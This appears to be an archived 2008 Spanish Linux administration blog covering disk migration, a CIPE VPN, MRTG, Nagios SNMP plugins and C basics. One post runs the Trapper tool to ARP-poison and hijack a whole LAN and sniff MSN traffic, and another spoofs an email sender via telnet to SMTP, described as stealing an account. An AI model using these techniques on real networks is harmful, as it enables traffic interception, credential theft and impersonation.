acaso, en su ubicación original: ya tendría tiempo de borrarlo si todo iba bien. En la copia elegí
preservar atributos, permisos y enlaces.
Bueno, ahora ya tenía los datos copiados, era hora de aplicar los cambios al fstab. En el
archivo /etc/fstab nos encontramos las distintas particiones de nuestros discos junto con sus respectivos
puntos de montaje. En mi caso el tema era substituir la partición donde estaba montada var, a
saber, /dev/da1 y crear una nueva entrada.
Después de realizar las modificaciones pertinentes siendo root mi archivo quedó de la siguiente
manera:
finamex-case:/etc/apache2/conf.d# cat /etc/fstab
# /etc/fstab: static file system information.
#
#
proc /proc proc defaults 0 0
/dev/hda1 / ext3 defaults,errors=remount-ro 0 1
/dev/sda1 /var ext3 defaults 0 2
/dev/hda5 none swap sw 0 0
/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto 0 0
/dev/sda1 /media/usb0 auto rw,user,noauto 0 0
NOTA:el directorio var antes estaba dentro de la particion root.
Desmonté las particiones y ¡ a reiniciar la máquina se ha dicho ! y el sistema no arrancó,
afortunadamente tenía a mano una mini-distro de dos disquetes ( para estas cosas van
muy bien ), así que para salir del paso tuve que reiniciar la máquina con el disquete, montar /dev/hda1 y
corregir la metida de pata del /etc/fstab.
¡Y ya está!, ya tenía el sistema funcionando otra vez. Ahora solo me quedaba borrar el contenido
de /dev/hda donde se había quedado la información de var, antigua y aprovecharlo para otro punto de
montaje, en mi caso /opt . El proceso es practicamente el mismo que antes:
Si alguien es un poco más lanzado que yo puede hacer algunas de las cosas que yo he hecho paso a
paso de una vez y evitar un par de reinicios, pero a mi con los datos me gusta ir paso a paso.
Contando los reinicios, la copia de los datos, la metida de pata, el tiempo de instalación del nuevo disco
y la configuración de BIOS el tiempo total me superó la media hora.ya que era la primera vez que lo
hacia.Es decir, es más rápido hacerlo que contarlo, pero espero que esta experiencia sirva a aquellos que
se puedan encontrar en mi misma situación.
Pueden checar mas articulos en el blog. y cheque que ya se haerca el flisol 2008
Ekxo

TRAPPER SNIIFER

2008-03-03T16:49:00.000-08:00

TRAPPER ES UN SNIFFER BASADO EN CAIN PERO ESTE ES PARA LINUX MUY BUENA HERRAMIENTA

Trapper is a simple tool for sniffing protocols like http, ftp, telnet
pop3, imap, smtp, msn, irc and smb. Also this tool include the attack
known as APR ( ARP Poison Routing ). More protocols and types of
attacks will be added in the future.

---:[ Requirements ]:---

Before using trapper you will require this modules.

-Net::IP
-Net::RawIP
-Getopt::Std
-NetPacket::Ethernet
-Time::HiRes
-Net::Pcap
-Net::Ping
-Net::ARP
-Proc::Simple
-Net::Frame
-Net::Frame::Layer::ARP
-Net::Frame::Simple
-Net::Frame::Dump::Online
-NetPacket::IP
-NetPacket::TCP

root@desarrollo-pc:/home/ekxo/Escritorio/trapper-0.3.5# perl install.pl

[*] Trapper Installer 0.1

Are you ready to continue? (Y/N) [Y]: y
[*] Checking for: Proc::Simple... [OK]
[*] Checking for: Getopt::Std... [OK]
[*] Checking for: Time::HiRes... [OK]
[*] Checking for: Net::Pcap... [OK]
[*] Checking for: NetPacket::IP... [OK]
[*] Checking for: NetPacket::TCP... [OK]
[*] Checking for: NetPacket::Ethernet... [OK]
[*] Checking for: Net::IP... [OK]
[*] Checking for: Net::ARP... [OK]
[*] Checking for: Net::RawIP... [OK]
[*] Checking for: Net::Ping... [OK]
[*] Checking for: Net::Frame... [OK]
[*] Checking for: Net::Frame::Layer... [OK]
[*] Checking for: Net::Frame::Layer::ARP... [OK]
[*] Checking for: Net::Frame::Simple... [OK]
[*] Checking for: Net::Frame::Dump... [OK]
[*] Checking for: Net::Frame::Dump::Online... [OK]
[*] Installation done, you can run now trapper =)

root@desarrollo-pc:/home/ekxo/Escritorio/trapper-0.3.5# ./trapper.pl -i eth0 -m apr -f 00:02:5C:17:2B:FA

-------------------------------------------------------------------
trapper ver. 0.3.5
Authors: crypkey, nediam, nahual

-------------------------------------------------------------------

[*] Fake your mac address, please follow the steps...
[*] Number of linux distro ( 'L' for list): L

1) Ubuntu
2) Debian/Slackware/Mandriva/Fedora/Other

[*] Choose a number: 1
[*] Right click on network manager icon and deselect networking
[*] You ready to continue? (Y/N) [Y]: Y
[*] Faking your mac addr to 00:02:5C:17:2B:FA, please wait...
SIOCSIFHWADDR: Dispositivo ó recurso ocupado
[*] Done..
[*] Right click on network manager icon and select networking.
[*] Wait until you have internet again.
[*] You ready to continue? (Y/N) [Y]: Y
[*] MODE SELECTED: ARP POISON ROUTING
[*] Specify the range to scan (ex. 192.168.1.0 - 192.168.1.254 )

Range: 192.168.1.0-192.168.1.254

[*] Scanning range from 192.168.1.0 to 192.168.1.254...
[*] Skipping our host (IP attacker): 192.168.1.67
[*] Victim IP: 192.168.1.40 MAC: 00:08:5d:18:5b:09
[*] Victim IP: 192.168.1.41 MAC: 00:08:5d:18:5b:0f
[*] Victim IP: 192.168.1.42 MAC: 00:08:5d:18:5b:15
[*] Victim IP: 192.168.1.43 MAC: 00:08:5d:18:5b:07
[*] Victim IP: 192.168.1.44 MAC: 00:08:5d:18:1a:61
[*] Victim IP: 192.168.1.45 MAC: 00:08:5d:18:5b:19
[*] Victim IP: 192.168.1.46 MAC: 00:08:5d:18:02:5a
[*] Victim IP: 192.168.1.64 MAC: 00:16:d3:4c:98:f6
[*] Victim IP: 192.168.1.69 MAC: 00:12:a9:31:d6:60
[*] Victim IP: 192.168.1.75 MAC: 00:50:8b:4b:4e:48
[*] Victim IP: 192.168.1.76 MAC: 00:1a:73:56:95:51
[*] Victim IP: 192.168.1.77 MAC: 00:1c:c4:82:c1:9c
[*] Victim IP: 192.168.1.78 MAC: 00:17:a4:e4:1d:2f
[*] Victim IP: 192.168.1.80 MAC: 00:1b:78:07:10:75
[*] Victim IP: 192.168.1.100 MAC: 00:19:21:0b:2f:96
[*] Victim IP: 192.168.1.254 MAC: 00:1d:5a:2a:6e:a9
[*] Victim IP: 192.168.1.77 MAC: 00:1c:c4:82:c1:9c
[*] Hosts found: 17
[*] Select Option:
[*] 1) One-to-One: Hijack the traffic only between two particular hosts
[*] 2) One-to-All: Hijack the network faking a single host (The default gateway is a good option)
[*] 3) Hijack the entire network
Type of attack: 3
[*] Infecting Host(s)...
[*] Leaving arp-poison into background: pid 10274 ...
[*] Using fake mac addr: 00:02:5C:17:2B:FA
[*] Supported protocols:

1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
10. ALL

Select option(s) [default: 10]: 7

[*] Sniffing using Dev :eth0:
[*] Filter :tcp and port 1863:
AQUI EMPEZAMOS A JUGAR !!!! JEEEEEEEEEEEEEEEEE!!!!JIIIII

BUG in MAIL

2008-02-25T14:52:00.000-08:00

DEBEMOS DE TENER INSTALADO SENDMAIL O CUALQUIER SERVIDOR DE SMTP

ROBAMOS LA CUENTA DE ALGUIEN ENVIANDO UN CORREO SIN QUE ELLA O EL LO HAYA ENVIADO..

[root@desarrollo ~]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 desarrollo.generis.com.mx ESMTP Sendmail 8.14.2/8.14.2; Mon, 25 Feb 2008 16:35:14 -0600
mail from:ekxo@generis.com.mx
250 2.1.0 ekxo@generis.com.mx... Sender ok
rcpt to:drag0n3t@hotmail.com
250 2.1.5 drag0n3t@hotmail.com... Recipient ok
data
354 Enter mail, end with "." on a line by itself
steal account
.
250 2.0.0 m1PMZE3q009330 Message accepted for delivery
quit
221 2.0.0 desarrollo.generis.com.mx closing connection
Connection closed by foreign host.
[root@desarrollo ~]#

VPN CON LINUX REDHAT CIPE

2008-02-14T12:08:00.000-08:00

CIPE ES UN PROTOCOLO PARA CREAR TUNELES ES PROPIO DE RH AQUI VEMOSLA CONFIGURACION ENTRE 2 HOST ATRAVEZ DE INTERNET CON ESTE PROTOCOLO AUNQUE DESPUES POSTEO LA DE IPSEC QUE ES UN STANDART.AQUI TENEMOS YA UNA SALIDA A INTERNET POR CADA HOST .

VPN CON LINUX REDHAT CIPE

PROTOCOLOS DE SEGURIDAD DE UNA VPN

PPTP
IPSEC
CIPE (CRIPTO IP ENCAPSULATION,PORPIO DE RH)
FUNCIONA EN ELACE PUNTO A PUNTO COOMO PPP
ES UN PAQUETE SENCILLO Y LIGERO PARA CREAR TUNELES SOBRE UDP
ESTA DISPONIBLE BAJO GPL GNU
HAY VERSIONES PARA NT Y LINUX

COMPONENTES DE CIPE

CONSTA DE UN MODULO DE KERNEL (CIPCB)
EL KERNEL REALIZA FUNCIONES COMO:
MANIPULACION DE PAQUETES
TRANSMICION Y RECEPCCION.
UTILIZA CIFRADO SIMETRICO
CREA UN DISPOSITIVO VIRTUAL PARA EL ENCAMINAMIENTO.
EL NOMBRE DEL DISPOSITIVO DEPENDE DEL ALGORIMO Y VERSION DE PROTOCOLO

CIFRADO SIMETRICO Y ASIMETRICO

CIPE SOPORTA ALGORITMOS SIMETRICOS COMO:

BLOWFISH:128 BITS
IDEA:ESTA PATENTADO

vp1 host 1
[root@localhost root]# ifconfig
cipcb0 Link encap:IPIP Tunnel HWaddr
inet addr:192.168.3.254 P-t-P:192.168.4.254 Mask:255.255.255.255
UP POINTOPOINT NOTRAILERS RUNNING NOARP MTU:1442 Metric:1
RX packets:427 errors:0 dropped:0 overruns:0 frame:0
TX packets:432 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:45984 (44.9 Kb) TX bytes:55032 (53.7 Kb)

eth1 Link encap:Ethernet HWaddr 00:0E:A6:9E:3B:F2
inet addr:192.168.3.254 Bcast:192.168.3.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4096 errors:0 dropped:0 overruns:0 frame:0
TX packets:84 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1121459 (1.0 Mb) TX bytes:6804 (6.6 Kb)
Interrupt:10 Base address:0xe000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:33570 errors:0 dropped:0 overruns:0 frame:0
TX packets:33570 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3588888 (3.4 Mb) TX bytes:3588888 (3.4 Mb)

ppp0 Link encap:Point-to-Point Protocol
inet addr:148.221.197.202 P-t-P:148.235.20.149 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1524 Metric:1
RX packets:498 errors:0 dropped:0 overruns:0 frame:0
TX packets:556 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:66622 (65.0 Kb) TX bytes:80811 (78.9 Kb)

********
[root@localhost root]# vim /etc/sysconfig/network-scripts/route-cipcb0
GATEWAY0=192.168.4.254
NETMASK0=255.255.255.0
ADDRESS0=192.168.4.0
~

***********
[root@localhost root]# vim /etc/sysconfig/network-scripts/ifcfg-cipcb0

# Please read /usr/share/doc/initscripts-*/sysconfig.txt
# for the documentation of these parameters.
ONBOOT=yes
USERCTL=no
PEERDNS=no
TYPE=CIPE
IPADDR=192.168.3.254
DEVICE=cipcb0
MYPORT=7777
PTPADDR=192.168.4.254
PEER=0.0.0.0:7777
ME=148.221.197.202
~

*******************
[root@localhost root]# vim /etc/cipe/options.cipcb0

cttl 64
maxerr -1
key be3a8f753f0782e6efd0a7f2ca7d8136
arg 192.168.4.0
~
***************
[root@localhost root]# vim /etc/sysctl.conf
# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Controls IP packet forwarding
net.ipv4.ip_forward = 1

# Controls source route verification
net.ipv4.conf.default.rp_filter = 1

# Controls the System Request debugging functionality of the kernel
kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename.
# Useful for debugging multi-threaded applications.
kernel.core_uses_pid = 1

***************
[root@localhost root]# echo 1 > /proc/sys/net/ipv4/ip_forward
***************
[root@localhost root]# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.4.254 * 255.255.255.255 UH 0 0 0 cipcb0
192.168.4.0 192.168.4.254 255.255.255.0 UG 0 0 0 cipcb0
192.168.3.0 * 255.255.255.0 U 0 0 0 eth1
169.254.0.0 * 255.255.0.0 U 0 0 0 eth1
127.0.0.0 * 255.0.0.0 U 0 0 0 lo

******************

vpn2
[root@localhost root]# vim /etc/sysconfig/network-scripts/route-cipcb0
GATEWAY0=192.168.3.254
NETMASK0=255.255.255.0
ADDRESS0=192.168.3.0
***********
[root@localhost root]# vim /etc/sysconfig/network-scripts/ifcfg-cipcb0
# Please read /usr/share/doc/initscripts-*/sysconfig.txt
# for the documentation of these parameters.
ONBOOT=no
USERCTL=no
PEERDNS=no
TYPE=CIPE
IPADDR=192.168.4.254
DEVICE=cipcb0
MYPORT=7777
PTPADDR=192.168.3.254
PEER=148.221.197.202:7777
ME=0.0.0.0
**************
[root@localhost root]# vim /etc/cipe/options.cipcb0

cttl 64
maxerr -1
key be3a8f753f0782e6efd0a7f2ca7d8136
arg 192.168.3.0

*********
[root@localhost root]# vim /etc/sysctl.conf
# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Controls IP packet forwarding
net.ipv4.ip_forward = 1

# Controls source route verification
net.ipv4.conf.default.rp_filter = 1

# Controls the System Request debugging functionality of the kernel
kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename.
# Useful for debugging multi-threaded applications.
kernel.core_uses_pid = 1

*************
[root@localhost root]# vim /proc/sys/net/ipv4/ip_forward
1
********************

¿Qué es un shell?

2008-02-13T15:25:00.000-08:00

Es una parte fundamental de todo sistema operativo que se encarga de ejecutar órdenes
básicas para el manejo del sistema.
Suelen incorporar características como:
• control de procesos
• redirección de ficheros
• leguaje para escribir pequeños programas

LOS IMPORTANTES:

• command.com cmd.exe - DOS y derivados
• ksh - korn shell de UNIX
• chs - C shell, similar en sitaxis al lenguaje de programación C
• bsh - Bourne shell
• tcsh, zsh, ash, ...
• bash - Bourne Again shell, el shell mayoritario de sistemas Linux

Patrones de sustitución

Hay ciertos caracteres que el shell sustituirá por otro contenido en base a unas reglas.
*
cualquier cadena de texto
Ejemplo:
$ echo /usr/*
?
un solo caracter cualquiera
Ejemplo:
$ echo /usr/?bin
$ echo /usr/????
[...]
cualquiera de los caracteres entre corchetes
Ejemplo:
$ echo /usr/[aeiou]*

Redirección de ficheros
Definición clásica: Un fichero informático es una entidad lógica compuesta por una
secuencia de bits, almacenada en un sistema de archivos ubicada en la memoria de un
ordenador. QUE ESTA MUY MAMONA LA DEFINICION JEEEEE!!!!!!!
En UNIX todo es un fichero. Es decir, se pueden aplicar a todos los objetos las acciones
que soporta un fichero en su definición clásica: abrir, cerrar, leer, escribir, etc.

Ficheros estándar que están abiertos para todo programa en ejecución:
• Entrada estándar /dev/stdin (ej. DE Teclado)
• Salida estándar /dev/stdout (ej. Pantalla)
• Salida de error /dev/stderr (ej.DE Pantalla)

/dev/null -> "la nada de UNIX"
/dev/zero -> fuente infinita de ceros
/dev/random -> datos aleatorios

MRTG The Multi Router Traffic Grapher

2008-02-12T10:06:00.000-08:00

QUE ES MRTG BUENO EN INGLES SIGNIFICA The Multi Router Traffic Grapher ES UN SISTEMA OPEN SOURCE QUE MONITOREA VIA SNMP CUALQUIER DISPOSITOVO DENTRO DE UNA RED CREANDO UNAS GRAFICAS CHIDAS SI TIENES UN ROUTER ESTA HERRAMIENTA TEVA GUSTAR YA QUE TE PERMITE VER EL ESTADO DE LAS INTERFACES ,EL ANCHO DE BANDA BUENO EL MONITOREO DE INTERFACES ES SOLO UNA DE LAS COSAS QUE PODEMOS HACER PERO TAMBIEN PODEMOS MONITOREAR LA TEMPERATURA Y HUMEDAD DE NUESTRO DISPOSITIVO ESTA CHIDO NO!!!

[root@desarrollo mrtg-2.16.0]# wget http://oss.oetiker.ch/mrtg/pub/mrtg-2.16.0.zip

[root@desarrollo mrtg-2.16.0]# unzip mrtg-2.16.0.zip

[root@desarrollo mrtg-2.16.0]# yum install libpng zlib gd
Setting up Install Process
Parsing package install arguments
Package libpng - 2:1.2.22-1.fc8.i386 is already installed.
Package zlib - 1.2.3-14.fc8.i386 is already installed.
Nothing to do
[root@desarrollo mrtg-2.16.0]# ./configure --prefix=/usr/local/mrtg-2
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking how to run the C preprocessor... gcc -E
checking whether make sets $(MAKE)... yes
checking for a BSD-compatible install... /usr/bin/install -c
checking for perl... /usr/bin/perl
checking for groff... /usr/bin/groff
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for inttypes.h... (cached) yes
checking for unsigned long long... yes
checking for long long... yes
checking for strtoll... yes
checking for printf long long format specifier... %lld
checking for pow in -lm... yes
checking for gdImageGif in -lgd... yes
checking for gdImagePng in -lgd... yes
checking for gdImagePng_jpg in -lgd... no
checking for gdImagePng_jpg_ft in -lgd... no
checking for gdImageGd in -lgd... no
checking gd.h usability... yes
checking gd.h presence... yes
checking for gd.h... yes
checking the weather... (cached) it's fine
checking if we can use GCC-specific compiler options... yes
configure: creating ./config.status
config.status: creating Makefile
config.status: WARNING: Makefile.in seems to ignore the --datarootdir setting
config.status: creating config.h
ordering CD from http://tobi.oetiker.ch/wish .... just kidding ;-)

----------------------------------------------------------------
Config is DONE!

Type 'make' to compile the software

... that wishlist mentioned above does really exist. So if
you feel like showing your appreciation for MRTG, this is the
place to go. I just love CDs and DVDs

-- Tobi Oetiker
----------------------------------------------------------------
[root@desarrollo mrtg-2.16.0]# make
gcc -DGFORM_GD=gdImagePng -g -O2 -Wall -Wpointer-arith -Wcast-align -Wmissing-declarations -Wnested-externs -Winline -W -DHAVE_CONFIG_H -c ./src/rateup.c -o bin/rateup.o
LD_RUN_PATH= gcc bin/rateup.o -o bin/rateup -lgd -lpng -lz -lm
/usr/bin/perl -0777 -p -i~ -e "s'^#!\s*/\S*perl'#! /usr/bin/perl'" ./bin/cfgmaker ./bin/indexmaker ./bin/mrtg
/usr/bin/perl -0777 -p -i~ -e 's@GRAPHFMT="...";@GRAPHFMT="png";@' ./bin/mrtg ./bin/indexmaker

[root@desarrollo mrtg-2.16.0]# make install
/usr/bin/perl -0777 -p -i~ -e "s'^#!\s*/\S*perl'#! /usr/bin/perl'" ./bin/cfgmaker ./bin/indexmaker ./bin/mrtg
/usr/bin/perl -0777 -p -i~ -e 's@GRAPHFMT="...";@GRAPHFMT="png";@' ./bin/mrtg ./bin/indexmaker
/bin/sh ./mkinstalldirs /usr/local/mrtg-2/bin
mkdir /usr/local/mrtg-2
mkdir /usr/local/mrtg-2/bin
for x in ./bin/mrtg ./bin/cfgmaker ./bin/indexmaker ./bin/mrtg-traffic-sum; do \
/usr/bin/install -c -m 755 $x /usr/local/mrtg-2/bin; done
for x in bin/rateup; do \
/usr/bin/install -c -m 755 $x /usr/local/mrtg-2/bin; done
/bin/sh ./mkinstalldirs /usr/local/mrtg-2/lib/mrtg2/Pod
mkdir /usr/local/mrtg-2/lib
mkdir /usr/local/mrtg-2/lib/mrtg2
mkdir /usr/local/mrtg-2/lib/mrtg2/Pod
for x in ./lib/mrtg2/*.pm; do \
/usr/bin/install -c -m 644 $x /usr/local/mrtg-2/lib/mrtg2; done
for x in ./lib/mrtg2/Pod/*.pm; do \
/usr/bin/install -c -m 644 $x /usr/local/mrtg-2/lib/mrtg2/Pod; done
/bin/sh ./mkinstalldirs /usr/local/mrtg-2/share/mrtg2/icons
mkdir /usr/local/mrtg-2/share
mkdir /usr/local/mrtg-2/share/mrtg2
mkdir /usr/local/mrtg-2/share/mrtg2/icons
for x in ./images/*.gif ./images/*.png; do \
/usr/bin/install -c -m 644 $x /usr/local/mrtg-2/share/mrtg2/icons; done
/bin/sh ./mkinstalldirs /usr/local/mrtg-2/share/doc/mrtg2
mkdir /usr/local/mrtg-2/share/doc
mkdir /usr/local/mrtg-2/share/doc/mrtg2
(cd .; for x in COPYING COPYRIGHT README CHANGES THANKS doc/*.pod doc/*.txt doc/*.png; do \
/usr/bin/install -c -m 644 $x /usr/local/mrtg-2/share/doc/mrtg2; done)
/bin/sh ./mkinstalldirs /usr/local/mrtg-2/share/man/man1
mkdir /usr/local/mrtg-2/share/man
mkdir /usr/local/mrtg-2/share/man/man1
for x in ./doc/*.1; do \
/usr/bin/install -c -m 644 $x /usr/local/mrtg-2/share/man/man1; done
AHORA VA LA CONFIGURACION EN ESTA VERSION TRAEMOS UN SCRIPT QUE NOS PERMITE HACER LA CONFIGURACION SI NO DE OTRO MODO LO HARIAMOS A MANO...

[root@desarrollo mrtg-2.16.0]# cd bin/
[root@desarrollo bin]# ll
total 1092
-rwxr-xr-x 1 root root 107065 feb 12 11:53 cfgmaker
-rwxr-xr-x 1 root root 107065 feb 12 11:52 cfgmaker~
-rwxr-xr-x 1 root root 25663 feb 12 11:53 indexmaker
-rwxr-xr-x 1 root root 25663 feb 12 11:53 indexmaker~
-rwxr-xr-x 1 root root 102046 feb 12 11:53 mrtg
-rwxr-xr-x 1 root root 102046 feb 12 11:53 mrtg~
-rwxr-xr-x 1 root root 5952 dic 22 2006 mrtg-traffic-sum
-rwxr-xr-x 1 root root 101425 feb 12 11:52 rateup
-rwxr-xr-x 1 root root 222208 feb 6 08:35 rateup.exe
-rw-r--r-- 1 root root 156929 feb 17 2007 rateup.nlm
-rw-r--r-- 1 root root 104800 feb 12 11:52 rateup.o
[root@desarrollo bin]# ./cfgmaker --global 'WorkDir:/var/www/html/mrtg' --global 'Options[_]: bits,growright' --output /etc/mrtg/cfg/mrtg.cfg ekxo@localhost
SNMP Error:
no response received
SNMPv1_Session (remote host: "localhost" [127.0.0.1].161)
community: "ekxo"
request ID: -513429499
PDU bufsize: 8000 bytes
timeout: 2s
retries: 5
backoff: 1)
at /usr/src/mrtg-2.16.0/bin/../lib/mrtg2/SNMP_util.pm line 628
SNMPWALK Problem for 1.3.6.1.2.1.1 on ekxo@localhost::::::v4only
at ./cfgmaker line 950
WARNING: Skipping ekxo@localhost: as no info could be retrieved

creamos el archivo!!! de conf

LO CORREMOS
AQUI APARECEN UNOS ERORSILLO PERO EN MANUAL VIENIEN LOS PASOS PARA SOLUCIONARLOS
[root@desarrollo bin]# /usr/local/mrtg-2/bin/mrtg /etc/mrtg/cfg/mrtg.cfg
-----------------------------------------------------------------------
ERROR: Mrtg will most likely not work properly when the environment
variable LANG is set to UTF-8. Please run mrtg in an environment
where this is not the case. Try the following command to start:

env LANG=C /usr/local/mrtg-2/bin/mrtg /etc/mrtg/cfg/mrtg.cfg
-----------------------------------------------------------------------
[root@desarrollo bin]# env LANG=C /usr/local/mrtg-2/bin/mrtg /etc/mrtg/cfg/mrtg.cfg
ERROR: CFG Error in "workdir", line 20: Working directory /var/www/html/mrtg does not exist

[root@desarrollo bin]# mkdir -p /var/www/html/mrtg
[root@desarrollo bin]# env LANG=C /usr/local/mrtg-2/bin/mrtg /etc/mrtg/cfg/mrtg.cfg
[root@desarrollo bin]#

NAGIOS SNMP PLUGINS

2008-02-11T10:24:00.000-08:00

BUENO COMO HEMOS VISTO SOLO INSTALAMOS NAGIOS PERO AHORA VEREMOS COMO INSTALAR LOS PLUGINS CORRESPONDIENTES AL PROTOCOLO SNMP YA QUE ESTE NOS PERMITIRA HACER QUERYS A NUESTRO AGENTE TRAYENDO CONSIGO INFORMACION VALIOSA PARA EL MONITOREO.

BAJAMOS EL TARBALL DE http://sourceforge.net/projects/nagios-snmp/

AHORA YA QUE DESCOMPRIMIMOS NOS CLAVAMOS A LA CARPETA Y LOS INSTALAMOS CABE DESTACAR QUE ESTOS ESTAN ESRITOS EN PERL Y DEBEMOS TENER INSTALADO PERL UN EL SERVIDOR NAGIOS PA QUE CORRAN.

[root@desarrollo nagios_plugins]# ls
Changelog check_snmp_css_main.pl check_snmp_int.pl check_snmp_mem.pl
check_snmp_storage.pl doc README
check_snmp_boostedge.pl check_snmp_css.pl check_snmp_linkproof_nhr.pl check_snmp_nsbox.pl check_snmp_vrrp.pl install.sh
check_snmp_cpfw.pl check_snmp_env.pl check_snmp_load.pl check_snmp_process.pl check_snmp_win.pl LICENSE
[root@desarrollo nagios_plugins]# ./install.sh

###### Nagios snmp scripts installer ######

Will install all script(s)

What is your perl location ? [/usr/bin/perl]
Net::SNMP module version is 5.002000 [OK]
Module Getopt::Long found [OK]

What is your nagios plugin location ?
Note : file utils.pm must be present in it [/usr/local/nagios/libexec]

Where do you want the plugins to put temporary data (only used by some plugins) ?
Nagios user must be able to write files in it [/tmp]

Will now install all script(s) :
in directory : /usr/local/nagios/libexec
perl : /usr/bin/perl
temp directory : /tmp

OK ? [Y/n]Y

Installing check_snmp_boostedge.pl : OK

Installing check_snmp_css.pl : OK

Installing check_snmp_linkproof_nhr.pl : OK

Installing check_snmp_nsbox.pl : OK

Installing check_snmp_vrrp.pl : OK

Installing check_snmp_cpfw.pl : OK

Installing check_snmp_env.pl : OK

Installing check_snmp_load.pl : OK

Installing check_snmp_process.pl : OK

Installing check_snmp_win.pl : OK

Installing check_snmp_css_main.pl : OK

Installing check_snmp_int.pl : OK

Installing check_snmp_mem.pl : OK

Installing check_snmp_storage.pl : OK

Installation completed OK
You can delete all the source files and directory
Remember to look for informtation at http://www.manubulon.com/nagios/

Y COMO VERAN AHORA TENEMOS MAS PLUGINS

[root@desarrollo libexec]# ls
check_apt check_disk_smb check_ide_smart check_mrtg check_nwstat check_sensors check_snmp_linkproof_nhr.pl check_ssh negate
check_breeze check_dns check_ifoperstatus check_mrtgtraf check_oracle check_smtp check_snmp_load.pl check_swap urlize
check_by_ssh check_dummy check_ifstatus check_nagios check_overcr check_snmp_boostedge.pl check_snmp_mem.pl check_tcp utils.pm
check_clamd check_file_age check_imap check_nntp check_ping check_snmp_cpfw.pl check_snmp_nsbox.pl check_time utils.sh
check_cluster check_flexlm check_ircd check_nt check_pop check_snmp_css_main.pl check_snmp_process.pl check_udp
check_dhcp check_ftp check_load check_ntp check_procs check_snmp_css.pl check_snmp_storage.pl check_ups
check_dig check_http check_log check_ntp_peer check_real check_snmp_env.pl check_snmp_vrrp.pl check_users
check_disk check_icmp check_mailq check_ntp_time check_rpc check_snmp_int.pl check_snmp_win.pl check_wave

AQUI ESTA LA SALIDA DE UN QUERY VIA SNMP HAY QUE TENER EN CUENTA QUE BAJO LINUX ESTE PLUGIN UTILIZA LOS PROGRAMAS DE LA SUITE DE NET-SNMP ASI QIE HAY QUE INSTALARLOS PRIMERO YA QUE EL TRAP LO JALA CON NET-SNMP

[root@desarrollo libexec]# ./check_snmp_storage.pl -H 192.168.1.80 -C public -m / -w 80 -c 90
/var: 1%used(721MB/62306MB) /proc/sys/fs/binfmt_misc: 0%used(0MB/0MB) /boot: 3%used(30MB/874MB) /sys: 0%used(0MB/0MB) /var/lib/nfs/rpc_pipefs: 0%used(0MB/0MB) /: 30%used(2958MB/9702MB) (<80%) : OK

Programming whit C in LINUX

2008-02-08T20:25:00.000-08:00

ESTRUCTURA BASICA DE UN PROGRAMA.

BUENO AHORA LOS ELEMENTOS BASICOS DE UN PROGRAMA SON LAS DECALARACIONES,FUNCIONES Y COMETARIOS.
Y ESTAN ORGANIZADOS DE LA SIGUIENTE MANERA..

/****************************************************
* ...COMENTARIOS DE CABECERA... *
****************************************************/
...DECLARACION DE DATOS...
int main()
{
...LINEAS DE CODIGO COMPUTABLES...
return (0);
}

LOS COMENTARIOS AYUDAN AL RPOGRAMADOR Y A LOS DEMAS A SABER QUE VA HACER NUESTRO PROGRAMA Y LAS DECLARACIONES DE DATOS O DE VARIABLES NOS AYUDAN A SABER QUE TIPO DE DATOS VAMOS A UTILIZAR EN NUESTRO PROGRAMA. NUESTRA PRINCIPAL FUNCION ES MAIN YA QUE ES LA 1ERA QUE ES EJECUTADA Y DESPUES PUES ESTA VA LLAMANDO A LAS DEMAS FUNCIONES CON LA MARCHA DEL PROGRAMA.DIRECTAMENTE O INDIRECTAMENTE

int main()
{
Y TERMINA CON UN
return (0);
}

EN EL EJEMPLO DE HOLA MUNDO TENIAS LA SIGUIENTE LINEA DESPUES DEL ENCABEZADO #include ESTA ES UNA LIBRERIA Y LA QUE NOS PERMITE LA SALIDA Y ENTRADA DE DATOS ATRAVEZ DEL TECLADO Y PANTALLA BUENO NO SOLOPODEMOS IMPRIMIR UN SALUDO EN LA PANTALL NO ESTO VALE MADRE NECESITAMOS HACER CALCULOS MATEMATICOS P PROCESOS BASADOS EN ALGORITMOS BUENO TENEMOS 5 OPERADOSRES BASICOS.

Operador Significado

* Multiplicar
/ Dividir
+ Sumar
- Restar
% Porcentaje

okas existen prioridades por asi decrilo entre los operadores (* ),(/), and (% ) tienen precedececion sobre (+) y (-). Parentesis, ( ), puedes ser usada para agrupar opraciones mientras hablamos de programacion tomemos un brake para tomar una cervesita!!!jaaa

